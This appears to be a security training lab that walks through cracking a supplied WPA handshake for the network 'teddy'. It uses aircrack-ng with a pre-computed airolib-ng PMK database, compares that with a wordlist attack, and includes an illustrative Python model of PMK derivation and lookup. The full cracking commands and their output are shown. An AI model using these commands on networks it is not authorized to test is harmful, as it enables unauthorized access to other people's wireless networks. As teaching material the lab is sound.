Introduction
When cracking WPA/WPA2 handshakes with aircrack-ng, the standard method involves testing each password from a wordlist. For each password, aircrack-ng must compute a Pairwise Master Key (PMK) and check it against the captured handshake. This on-the-fly computation can be time-consuming, especially with large wordlists.
The airolib-ng tool offers a powerful optimization. It allows you to pre-compute all the PMKs for a specific network (ESSID) and a given wordlist, storing them in a database. When you run the attack, aircrack-ng can use this database to simply look up PMKs instead of computing them, resulting in a dramatic increase in cracking speed.
In this lab, you will learn how to use a pre-built airolib-ng database to crack a WPA handshake and compare its performance to a standard wordlist-based attack.
Capture a WPA Handshake for an ESSID in your Database
In this step, we will inspect the provided capture file to confirm it contains a valid WPA handshake. For this lab, a capture file named wpa.cap has been placed in your ~/project directory. This file contains a captured four-way handshake for the network we will be targeting.
Let's use aircrack-ng to view the contents of this file. This command doesn't start an attack; it simply parses the file and shows a summary of the networks it contains.
Run the following command in your terminal:
aircrack-ng wpa.cap
You should see output that lists the wireless networks found in the capture file. Note the ESSID (the network name) and the confirmation that a handshake was captured.
Opening wpa.cap
Read 1 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
(press CTRL+C to abort)
You can press CTRL+C to exit the aircrack-ng prompt. The important information is that we have a handshake for the ESSID teddy. This is the network we will target.
Construct the aircrack-ng Command for the Attack
In this step, we will begin constructing the aircrack-ng command for our attack. The basic syntax for a WPA attack is aircrack-ng [options] <capture file>.
To make the attack more efficient, especially when a capture file contains multiple networks, we can specify our target using the -e parameter followed by the ESSID. Based on the previous step, our target ESSID is teddy.
Let's add this to our command:
aircrack-ng -e teddy
This command is not yet complete. aircrack-ng still needs to know where to get the passwords or PMKs to test. In a standard attack, we would use the -w flag to provide a wordlist. However, for this lab, we will be using our pre-computed airolib-ng database. We will add the parameter for the database in the next step.
Specify the Database using the -r Parameter
In this step, we will complete our command by telling aircrack-ng to use the airolib-ng database. The parameter for this is -r (which stands for "read database").
During the setup process for this lab, a database named mydb was created in your ~/project directory. This database contains the pre-computed PMKs for the ESSID teddy and the passwords from wordlist.txt.
Now, let's combine all the pieces: the aircrack-ng command, the target ESSID (-e teddy), the database (-r mydb), and the capture file (wpa.cap).
The final command is:
aircrack-ng -e teddy -r mydb wpa.cap
This command instructs aircrack-ng to:
- Target the network with ESSID teddy.
- Use the pre-computed PMKs from the database mydb.
- Test these PMKs against the handshake found in wpa.cap.
In the next step, we will execute this command and observe the results.
Run the Attack and Observe the Cracking Speed
In this step, it's time to run the attack using our fully constructed command. By using the pre-computed database, we expect the cracking process to be extremely fast.
Execute the following command in your terminal:
aircrack-ng -e teddy -r mydb wpa.cap
The program will start, open the database and the capture file, and almost instantly find the correct key.
Your output should look similar to this:
Opening mydb
Opening wpa.cap
Read 1 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening mydb
Attack will be restarted every 5000 PMKs.
Starting attack on ESSID teddy...
KEY FOUND! [ biscotte ]
Master Key : 45 45 79 A2 25 5D F9 5A 47 2B 1E 15 7E 22 38 84
...
Transient Key : 82 2A 8F 85 42 29 A2 1A 29 69 F1 25 2B 23 4C 78
...
EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Notice how quickly the KEY FOUND! message appeared. The password is biscotte. Because the PMKs were already computed and stored in the mydb database, aircrack-ng only had to perform a quick lookup and comparison, not the intensive cryptographic calculations.
Compare Performance to a Standard Wordlist Attack
In this step, to fully appreciate the speed of the airolib-ng database method, we will perform the same attack using the traditional wordlist method. This will allow us to see the performance difference firsthand.
In a standard attack, we use the -w parameter to specify a wordlist file. aircrack-ng will then read each password from the file, compute its PMK, and test it.
The setup process created a file named wordlist.txt for this purpose. Let's run the attack using this file.
Execute the following command:
aircrack-ng -e teddy -w wordlist.txt wpa.cap
You will see aircrack-ng start up and begin testing keys. Pay attention to the status display, which shows the number of keys tested and the current speed in keys per second (k/s).
Opening wpa.cap
Read 1 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa.cap
Opening wordlist.txt
Reading passwords from wordlist.txt
[0:00:00] 2 keys tested (XXXX.XX k/s)
KEY FOUND! [ biscotte ]
Master Key : 45 45 79 A2 25 5D F9 5A 47 2B 1E 15 7E 22 38 84
...
Transient Key : 82 2A 8F 85 42 29 A2 1A 29 69 F1 25 2B 23 4C 78
...
EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
While the key is still found quickly because our wordlist is very small, notice that aircrack-ng still had to read each candidate password and compute its PMK before testing it. With a large wordlist containing millions of passwords, this process would take a significant amount of time. The database attack, in contrast, was nearly instantaneous because the computationally expensive part had already been done when the database was built.
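To make the difference between the two methods concrete, here is an added Python example; it is not part of the lab and not aircrack-ng's or airolib-ng's code. It derives PMKs with the standard WPA-Personal parameters (PBKDF2-HMAC-SHA1, ESSID as salt, 4096 rounds, 32 bytes), models the -w attack (derive, then test) and the -r attack (test stored PMKs only), counts how many PBKDF2 runs each needs, and shows that a pre-computed table is bound to the ESSID it was built for. The Handshake class, the sample wordlist and the passphrase check are constructed simplifications: real aircrack-ng verifies a PMK by deriving the PTK and recomputing the EAPOL MIC, which this example collapses to a direct PMK comparison.

```python
import hashlib
import hmac

PBKDF2_ROUNDS = 4096  # 802.11i PSK derivation parameters
PMK_LEN = 32

# Constructed sample wordlist (stands in for the lab's wordlist.txt); "biscotte" is the
# passphrase the lab recovers.
WORDLIST = ["password", "letmein", "sunshine", "biscotte", "qwerty123"]


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes).
    This is the expensive step aircrack-ng repeats for every candidate in a -w attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               PBKDF2_ROUNDS, PMK_LEN)


class Handshake:
    """Simplified stand-in for a captured four-way handshake (an assumption of this
    example). aircrack-ng derives a PTK from the PMK plus the captured nonces and MACs
    and recomputes the EAPOL MIC; here that check is collapsed to a constant-time
    comparison against the PMK of the true passphrase."""

    def __init__(self, essid: str, true_passphrase: str):
        self.essid = essid
        self._pmk = derive_pmk(true_passphrase, essid)

    def mic_matches(self, pmk: bytes) -> bool:
        return hmac.compare_digest(pmk, self._pmk)


def build_pmk_table(essid: str, wordlist) -> list:
    """Pre-computation phase, the role airolib-ng plays when it batch-processes an
    imported ESSID and wordlist: derive every PMK once and store (pmk, passphrase)."""
    return [(derive_pmk(pw, essid), pw) for pw in wordlist]


def crack_wordlist(hs: Handshake, wordlist):
    """-w attack: derive each candidate's PMK, then test it.
    Returns (passphrase or None, number of PBKDF2 runs performed)."""
    calls = 0
    for pw in wordlist:
        calls += 1
        if hs.mic_matches(derive_pmk(pw, hs.essid)):
            return pw, calls
    return None, calls


def crack_with_table(hs: Handshake, table):
    """-r attack: test stored PMKs only; no PBKDF2 runs during cracking.
    Returns (passphrase or None, number of PBKDF2 runs performed)."""
    for pmk, pw in table:
        if hs.mic_matches(pmk):
            return pw, 0
    return None, 0


if __name__ == "__main__":
    hs = Handshake("teddy", "biscotte")
    print("wordlist attack:", crack_wordlist(hs, WORDLIST))
    table = build_pmk_table("teddy", WORDLIST)
    print("database attack:", crack_with_table(hs, table))
    # The table is bound to the ESSID: the same PMKs do not match another network.
    print("other ESSID:", crack_with_table(Handshake("teddy2", "biscotte"), table))
```

The ESSID dependence is the defender's takeaway: a table built for one network name is useless against any other, so a unique ESSID combined with a long random passphrase leaves an attacker with the full per-candidate PBKDF2 cost, whereas a default or common ESSID is exactly what pre-computation is built around.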
Summary
In this lab, you successfully cracked a WPA handshake using a pre-computed airolib-ng database. You learned how to construct the aircrack-ng command using the -r parameter to specify the database and observed its near-instantaneous performance.
By comparing this to a standard wordlist attack using the -w parameter, you witnessed the significant speed advantage of pre-computing PMKs. This technique is invaluable for security professionals when targeting a specific network with a large dictionary of potential passwords, as it separates the time-consuming computation phase from the final cracking phase.
